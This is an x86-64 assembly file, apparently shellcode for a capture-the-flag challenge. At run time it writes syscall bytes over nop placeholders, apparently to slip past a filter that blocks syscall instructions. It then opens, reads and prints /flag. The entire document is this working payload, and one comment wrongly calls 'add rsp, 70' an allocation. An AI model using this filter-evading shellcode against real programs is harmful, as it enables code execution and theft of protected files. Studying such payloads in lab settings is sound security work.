.intel_syntax noprefix

.section .text

    mov word ptr [rip + sys1], 0xf05
    mov word ptr [rip + sys2], 0xf05
    mov word ptr [rip + sys3], 0xf05  
    mov word ptr [rip + sys4], 0xf05    

    
    mov rax, 0x67616c662f   # encoded string: /flag

    push rax                # saving to stack

    mov rdi, rsp            # address of /flag
    mov rsi, 0
    mov rdx, 0
    mov rax, 2              # open file
sys1:
    nop
    nop

    # reading flag
    mov rdi, rax
    add rsp, 70             # allocating space to stack -> 70 byte
    mov rsi, rsp            # rsi = buffer on stack address
    mov rdx, 70
    mov rax, 0
sys2:
    nop
    nop

    mov rdi, 1
    mov rsi, rsp
    mov rdx, 70
    mov rax, 1
sys3:
    nop
    nop

    mov rax, 60
    mov rdi, 0
sys4:
    nop
    nop
